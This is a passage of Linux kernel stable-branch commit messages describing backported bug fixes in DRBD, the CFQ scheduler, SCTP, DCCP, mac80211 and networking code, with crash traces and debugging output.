commit
d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream.
Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.
DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
tcp_sendmsg() used to totally ignore the size parameter.
57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.
Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time". Apparently that was unlikely enough for most, so this went
unnoticed for years.
Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=
2336150
[4] http://e2.howsolveproblem.com/i/
1175162/
This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.
It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).
It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().
Fixes:
b411b3637fa7 ("The DRBD driver")
Cc: viro@zeniv.linux.org.uk
Cc: christoph.lechleitner@iteg.at
Cc: wolfgang.glas@iteg.at
Reported-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Tested-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Signed-off-by: Richard Weinberger <richard@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.ellenberg@linbit.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Glauber Costa [Fri, 23 Sep 2016 00:59:59 +0000 (20:59 -0400)]
cfq: fix starvation of asynchronous writes
commit
3932a86b4b9d1f0b049d64d4591ce58ad18b44ec upstream.
While debugging timeouts happening in my application workload (ScyllaDB), I have
observed calls to open() taking a long time, ranging everywhere from 2 seconds -
the first ones that are enough to time out my application - to more than 30
seconds.
The problem seems to happen because XFS may block on pending metadata updates
under certain circumnstances, and that's confirmed with the following backtrace
taken by the offcputime tool (iovisor/bcc):
ffffffffb90c57b1 finish_task_switch
ffffffffb97dffb5 schedule
ffffffffb97e310c schedule_timeout
ffffffffb97e1f12 __down
ffffffffb90ea821 down
ffffffffc046a9dc xfs_buf_lock
ffffffffc046abfb _xfs_buf_find
ffffffffc046ae4a xfs_buf_get_map
ffffffffc046babd xfs_buf_read_map
ffffffffc0499931 xfs_trans_read_buf_map
ffffffffc044a561 xfs_da_read_buf
ffffffffc0451390 xfs_dir3_leaf_read.constprop.16
ffffffffc0452b90 xfs_dir2_leaf_lookup_int
ffffffffc0452e0f xfs_dir2_leaf_lookup
ffffffffc044d9d3 xfs_dir_lookup
ffffffffc047d1d9 xfs_lookup
ffffffffc0479e53 xfs_vn_lookup
ffffffffb925347a path_openat
ffffffffb9254a71 do_filp_open
ffffffffb9242a94 do_sys_open
ffffffffb9242b9e sys_open
ffffffffb97e42b2 entry_SYSCALL_64_fastpath
00007fb0698162ed [unknown]
Inspecting my run with blktrace, I can see that the xfsaild kthread exhibit very
high "Dispatch wait" times, on the dozens of seconds range and consistent with
the open() times I have saw in that run.
Still from the blktrace output, we can after searching a bit, identify the
request that wasn't dispatched:
8,0 11 152 81.
092472813 804 A WM
141698288 + 8 <- (8,1)
141696240
8,0 11 153 81.
092472889 804 Q WM
141698288 + 8 [xfsaild/sda1]
8,0 11 154 81.
092473207 804 G WM
141698288 + 8 [xfsaild/sda1]
8,0 11 206 81.
092496118 804 I WM
141698288 + 8 ( 22911) [xfsaild/sda1]
<==== 'I' means Inserted (into the IO scheduler) ===================================>
8,0 0 289372 96.
718761435 0 D WM
141698288 + 8 (
15626265317) [swapper/0]
<==== Only 15s later the CFQ scheduler dispatches the request ======================>
As we can see above, in this particular example CFQ took 15 seconds to dispatch
this request. Going back to the full trace, we can see that the xfsaild queue
had plenty of opportunity to run, and it was selected as the active queue many
times. It would just always be preempted by something else (example):
8,0 1 0 81.
117912979 0 m N cfq1618SN / insert_request
8,0 1 0 81.
117913419 0 m N cfq1618SN / add_to_rr
8,0 1 0 81.
117914044 0 m N cfq1618SN / preempt
8,0 1 0 81.
117914398 0 m N cfq767A / slice expired t=1
8,0 1 0 81.
117914755 0 m N cfq767A / resid=40
8,0 1 0 81.
117915340 0 m N / served: vt=
1948520448 min_vt=
1948520448
8,0 1 0 81.
117915858 0 m N cfq767A / sl_used=1 disp=0 charge=0 iops=1 sect=0
where cfq767 is the xfsaild queue and cfq1618 corresponds to one of the ScyllaDB
IO dispatchers.
The requests preempting the xfsaild queue are synchronous requests. That's a
characteristic of ScyllaDB workloads, as we only ever issue O_DIRECT requests.
While it can be argued that preempting ASYNC requests in favor of SYNC is part
of the CFQ logic, I don't believe that doing so for 15+ seconds is anyone's
goal.
Moreover, unless I am misunderstanding something, that breaks the expectation
set by the "fifo_expire_async" tunable, which in my system is set to the
default.
Looking at the code, it seems to me that the issue is that after we make
an async queue active, there is no guarantee that it will execute any request.
When the queue itself tests if it cfq_may_dispatch() it can bail if it sees SYNC
requests in flight. An incoming request from another queue can also preempt it
in such situation before we have the chance to execute anything (as seen in the
trace above).
This patch sets the must_dispatch flag if we notice that we have requests
that are already fifo_expired. This flag is always cleared after
cfq_dispatch_request() returns from cfq_dispatch_requests(), so it won't pin
the queue for subsequent requests (unless they are themselves expired)
Care is taken during preempt to still allow rt requests to preempt us
regardless.
Testing my workload with this patch applied produces much better results.
From the application side I see no timeouts, and the open() latency histogram
generated by systemtap looks much better, with the worst outlier at 131ms:
Latency histogram of xfs_buf_lock acquisition (microseconds):
value |-------------------------------------------------- count
0 | 11
1 |@@@@ 161
2 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 1966
4 |@ 54
8 | 36
16 | 7
32 | 0
64 | 0
~
1024 | 0
2048 | 0
4096 | 1
8192 | 1
16384 | 2
32768 | 0
65536 | 0
131072 | 1
262144 | 0
524288 | 0
Signed-off-by: Glauber Costa <glauber@scylladb.com>
CC: Jens Axboe <axboe@kernel.dk>
CC: linux-block@vger.kernel.org
CC: linux-kernel@vger.kernel.org
Signed-off-by: Glauber Costa <glauber@scylladb.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Willy Tarreau [Mon, 6 Feb 2017 07:59:06 +0000 (08:59 +0100)]
Revert "ipc/sem.c: optimize sem_lock()"
This reverts commit
901f6fedc5340d66e2ca67c70dfee926cb5a1ea0
(upstream commit
6d07b68ce16ae9535955ba2059dedba5309c3ca1).
As suggested in commit
5864a2fd3088db73d47942370d0f7210a807b9bc
(ipc/sem.c: fix complex_count vs. simple op race) since it introduces
a regression and the candidate fix requires too many changes for 3.10.
Cc: Manfred Spraul <manfred@colorfullife.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Michal Hocko [Thu, 1 Sep 2016 23:15:13 +0000 (16:15 -0700)]
kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd
commit
735f2770a770156100f534646158cb58cb8b2939 upstream.
Commit
fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal
exit") has caused a subtle regression in nscd which uses
CLONE_CHILD_CLEARTID to clear the nscd_certainly_running flag in the
shared databases, so that the clients are notified when nscd is
restarted. Now, when nscd uses a non-persistent database, clients that
have it mapped keep thinking the database is being updated by nscd, when
in fact nscd has created a new (anonymous) one (for non-persistent
databases it uses an unlinked file as backend).
The original proposal for the CLONE_CHILD_CLEARTID change claimed
(https://lkml.org/lkml/2006/10/25/233):
: The NPTL library uses the CLONE_CHILD_CLEARTID flag on clone() syscalls
: on behalf of pthread_create() library calls. This feature is used to
: request that the kernel clear the thread-id in user space (at an address
: provided in the syscall) when the thread disassociates itself from the
: address space, which is done in mm_release().
:
: Unfortunately, when a multi-threaded process incurs a core dump (such as
: from a SIGSEGV), the core-dumping thread sends SIGKILL signals to all of
: the other threads, which then proceed to clear their user-space tids
: before synchronizing in exit_mm() with the start of core dumping. This
: misrepresents the state of process's address space at the time of the
: SIGSEGV and makes it more difficult for someone to debug NPTL and glibc
: problems (misleading him/her to conclude that the threads had gone away
: before the fault).
:
: The fix below is to simply avoid the CLONE_CHILD_CLEARTID action if a
: core dump has been initiated.
The resulting patch from Roland (https://lkml.org/lkml/2006/10/26/269)
seems to have a larger scope than the original patch asked for. It
seems that limitting the scope of the check to core dumping should work
for SIGSEGV issue describe above.
[Changelog partly based on Andreas' description]
Fixes:
fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit")
Link: http://lkml.kernel.org/r/1471968749-26173-1-git-send-email-mhocko@kernel.org
Signed-off-by: Michal Hocko <mhocko@suse.com>
Tested-by: William Preston <wpreston@suse.com>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Roland McGrath <roland@hack.frob.com>
Cc: Andreas Schwab <schwab@suse.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steven Rostedt (Red Hat) [Sat, 24 Sep 2016 02:57:13 +0000 (22:57 -0400)]
tracing: Move mutex to protect against resetting of seq data
commit
1245800c0f96eb6ebb368593e251d66c01e61022 upstream.
The iter->seq can be reset outside the protection of the mutex. So can
reading of user data. Move the mutex up to the beginning of the function.
Fixes:
d7350c3f45694 ("tracing/core: make the read callbacks reentrants")
Reported-by: Al Viro <viro@ZenIV.linux.org.uk>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Oliver Neukum [Wed, 17 Aug 2016 13:51:55 +0000 (15:51 +0200)]
kaweth: fix firmware download
commit
60bcabd080f53561efa9288be45c128feda1a8bb upstream.
This fixes the oops discovered by the Umap2 project and Alan Stern.
The intf member needs to be set before the firmware is downloaded.
Signed-off-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jeremy Linton [Thu, 17 Nov 2016 15:14:25 +0000 (09:14 -0600)]
net: sky2: Fix shutdown crash
commit
06ba3b2133dc203e1e9bc36cee7f0839b79a9e8b upstream.
The sky2 frequently crashes during machine shutdown with:
sky2_get_stats+0x60/0x3d8 [sky2]
dev_get_stats+0x68/0xd8
rtnl_fill_stats+0x54/0x140
rtnl_fill_ifinfo+0x46c/0xc68
rtmsg_ifinfo_build_skb+0x7c/0xf0
rtmsg_ifinfo.part.22+0x3c/0x70
rtmsg_ifinfo+0x50/0x5c
netdev_state_change+0x4c/0x58
linkwatch_do_dev+0x50/0x88
__linkwatch_run_queue+0x104/0x1a4
linkwatch_event+0x30/0x3c
process_one_work+0x140/0x3e0
worker_thread+0x60/0x44c
kthread+0xdc/0xf0
ret_from_fork+0x10/0x50
This is caused by the sky2 being called after it has been shutdown.
A previous thread about this can be found here:
https://lkml.org/lkml/2016/4/12/410
An alternative fix is to assure that IFF_UP gets cleared by
calling dev_close() during shutdown. This is similar to what the
bnx2/tg3/xgene and maybe others are doing to assure that the driver
isn't being called following _shutdown().
Signed-off-by: Jeremy Linton <jeremy.linton@arm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eli Cooper [Thu, 1 Dec 2016 02:05:10 +0000 (10:05 +0800)]
ipv4: Set skb->protocol properly for local output
commit
f4180439109aa720774baafdd798b3234ab1a0d2 upstream.
When xfrm is applied to TSO/GSO packets, it follows this path:
xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()
where skb_gso_segment() relies on skb->protocol to function properly.
This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
fixing a bug where GSO packets sent through a sit tunnel are dropped
when xfrm is involved.
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Brian Norris [Wed, 9 Nov 2016 02:28:24 +0000 (18:28 -0800)]
mwifiex: printk() overflow with 32-byte SSIDs
commit
fcd2042e8d36cf644bd2d69c26378d17158b17df upstream.
SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
when we print them out.
This can be easily noticed by connecting to a network with a 32-octet
SSID:
[ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
'
0123456789abcdef0123456789abcdef <uninitialized mem>' bssid
xx:xx:xx:xx:xx:xx
Fixes:
5e6e3a92b9a4 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
Signed-off-by: Brian Norris <briannorris@chromium.org>
Acked-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Johannes Berg [Tue, 15 Nov 2016 11:05:11 +0000 (12:05 +0100)]
cfg80211: limit scan results cache size
commit
9853a55ef1bb66d7411136046060bbfb69c714fa upstream.
It's possible to make scanning consume almost arbitrary amounts
of memory, e.g. by sending beacon frames with random BSSIDs at
high rates while somebody is scanning.
Limit the number of BSS table entries we're willing to cache to
1000, limiting maximum memory usage to maybe 4-5MB, but lower
in practice - that would be the case for having both full-sized
beacon and probe response frames for each entry; this seems not
possible in practice, so a limit of 1000 entries will likely be
closer to 0.5 MB.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Johannes Berg [Wed, 5 Oct 2016 08:14:42 +0000 (10:14 +0200)]
mac80211: discard multicast and 4-addr A-MSDUs
commit
ea720935cf6686f72def9d322298bf7e9bd53377 upstream.
In mac80211, multicast A-MSDUs are accepted in many cases that
they shouldn't be accepted in:
* drop A-MSDUs with a multicast A1 (RA), as required by the
spec in 9.11 (802.11-2012 version)
* drop A-MSDUs with a 4-addr header, since the fourth address
can't actually be useful for them; unless 4-address frame
format is actually requested, even though the fourth address
is still not useful in this case, but ignored
Accepting the first case, in particular, is very problematic
since it allows anyone else with possession of a GTK to send
unicast frames encapsulated in a multicast A-MSDU, even when
the AP has client isolation enabled.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Felix Fietkau [Tue, 2 Aug 2016 09:13:41 +0000 (11:13 +0200)]
mac80211: fix purging multicast PS buffer queue
commit
6b07d9ca9b5363dda959b9582a3fc9c0b89ef3b5 upstream.
The code currently assumes that buffered multicast PS frames don't have
a pending ACK frame for tx status reporting.
However, hostapd sends a broadcast deauth frame on teardown for which tx
status is requested. This can lead to the "Have pending ack frames"
warning on module reload.
Fix this by using ieee80211_free_txskb/ieee80211_purge_tx_queue.
Signed-off-by: Felix Fietkau <nbd@nbd.name>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Stephen Suryaputra Lin [Thu, 10 Nov 2016 16:16:15 +0000 (11:16 -0500)]
ipv4: use new_gw for redirect neigh lookup
commit
969447f226b451c453ddc83cac6144eaeac6f2e3 upstream.
In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().
After commit
5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never gets resolved and the traffic is blackholed.
So, use the new_gw for neigh lookup.
Changes from v1:
- use __ipv4_neigh_lookup instead (per Eric Dumazet).
Fixes:
5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
WANG Cong [Thu, 25 Sep 2014 00:07:53 +0000 (17:07 -0700)]
neigh: check error pointer instead of NULL for ipv4_neigh_lookup()
commit
2c1a4311b61072afe2309d4152a7993e92caa41c upstream.
Fixes: commit
f187bc6efb7250afee0e2009b6106 ("ipv4: No need to set generic neighbour pointer")
Cc: David S. Miller <davem@davemloft.net>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Marcelo Ricardo Leitner [Thu, 3 Nov 2016 19:03:41 +0000 (17:03 -0200)]
sctp: assign assoc_id earlier in __sctp_connect
commit
7233bc84a3aeda835d334499dc00448373caf5c0 upstream.
sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread release it. But Andrey
Konovalov and Dmitry Vyukov reported an use-after-free in such
situation.
Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.
Fix is, instead of doing the read after waiting for the connect, do it
before so, and avoid this issue as the socket is still locked by then.
There should be no issue on returning the asoc id in case of failure as
the application shouldn't trust on that number in such situations
anyway.
This issue doesn't exist in sctp_sendmsg() path.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Thu, 3 Nov 2016 02:00:40 +0000 (19:00 -0700)]
dccp: fix out of bound access in dccp_v4_err()
commit
6706a97fec963d6cb3f7fc2978ec1427b4651214 upstream.
dccp_v4_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.
This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Thu, 3 Nov 2016 01:04:24 +0000 (18:04 -0700)]
dccp: do not send reset to already closed sockets
commit
346da62cc186c4b4b1ac59f87f4482b47a047388 upstream.
Andrey reported following warning while fuzzing with syzkaller
WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...
CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:15
[<
ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
[<
ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
[<
ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
[<
ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
[<
ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
[<
ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
[<
ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
[<
ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
[<
ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
[<
ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
[<
ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
[<
ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
[< inline >] exit_task_work include/linux/task_work.h:21
[<
ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
[<
ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
[<
ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
[<
ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
[<
ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
arch/x86/entry/common.c:156
[< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190
[<
ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
arch/x86/entry/common.c:259
[<
ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
(ftrace buffer empty)
Kernel Offset: disabled
Fix this the same way we did for TCP in commit
565b7b2d2e63
("tcp: do not send reset to already closed sockets")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Sat, 29 Oct 2016 18:02:36 +0000 (11:02 -0700)]
net: mangle zero checksum in skb_checksum_help()
commit
4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 upstream.
Sending zero checksum is ok for TCP, but not for UDP.
UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.
Simply replace such checksum by 0xffff, regardless of transport.
This error was caught on SIT tunnels, but seems generic.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Fri, 28 Oct 2016 20:40:24 +0000 (13:40 -0700)]
net: clear sk_err_soft in sk_clone_lock()
commit
e551c32d57c88923f99f8f010e89ca7ed0735e83 upstream.
At accept() time, it is possible the parent has a non zero
sk_err_soft, leftover from a prior error.
Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Marcelo Ricardo Leitner [Tue, 25 Oct 2016 16:27:39 +0000 (14:27 -0200)]
sctp: validate chunk len before actually using it
commit
bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 upstream.
Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.
The fix is to just move the check upwards so it's also validated for the
1st chunk.
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jiri Slaby [Fri, 21 Oct 2016 12:13:24 +0000 (14:13 +0200)]
net: sctp, forbid negative length
commit
a4b8e71b05c27bae6bad3bdecddbc6b68a3ad8cf upstream.
Most of getsockopt handlers in net/sctp/socket.c check len against
sizeof some structure like:
if (len < sizeof(int))
return -EINVAL;
On the first look, the check seems to be correct. But since len is int
and sizeof returns size_t, int gets promoted to unsigned size_t too. So
the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
false.
Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.
Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.
If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
[<
ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
[<
ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
[<
ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
[<
ffffffffb2819a30>] ? __kmalloc+0x330/0x540
[<
ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
[<
ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
[<
ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
[<
ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Anoob Soman [Wed, 5 Oct 2016 14:12:54 +0000 (15:12 +0100)]
packet: call fanout_release, while UNREGISTERING a netdev
commit
6664498280cf17a59c3e7cf1a931444c02633ed1 upstream.
If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.
This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()
Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Nikolay Aleksandrov [Sun, 25 Sep 2016 21:08:31 +0000 (23:08 +0200)]
ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route
commit
2cf750704bb6d7ed8c7d732e071dd1bc890ea5e8 upstream.
Since the commit below the ipmr/ip6mr rtnl_unicast() code uses the portid
instead of the previous dst_pid which was copied from in_skb's portid.
Since the skb is new the portid is 0 at that point so the packets are sent
to the kernel and we get scheduling while atomic or a deadlock (depending
on where it happens) by trying to acquire rtnl two times.
Also since this is RTM_GETROUTE, it can be triggered by a normal user.
Here's the sleeping while atomic trace:
[ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
[ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
[ 7858.212881] 2 locks held by swapper/0/0:
[ 7858.213013] #0: (((&mrt->ipmr_expire_timer))){+.-...}, at: [<
ffffffff810fbbf5>] call_timer_fn+0x5/0x350
[ 7858.213422] #1: (mfc_unres_lock){+.....}, at: [<
ffffffff8161e005>] ipmr_expire_process+0x25/0x130
[ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
[ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
[ 7858.214108]
0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
[ 7858.214412]
ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
[ 7858.214716]
000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
[ 7858.215251] Call Trace:
[ 7858.215412] <IRQ> [<
ffffffff813a7804>] dump_stack+0x85/0xc1
[ 7858.215662] [<
ffffffff810a4a72>] ___might_sleep+0x192/0x250
[ 7858.215868] [<
ffffffff810a4b9f>] __might_sleep+0x6f/0x100
[ 7858.216072] [<
ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
[ 7858.216279] [<
ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
[ 7858.216487] [<
ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
[ 7858.216687] [<
ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
[ 7858.216900] [<
ffffffff81573c70>] rtnl_unicast+0x20/0x30
[ 7858.217128] [<
ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
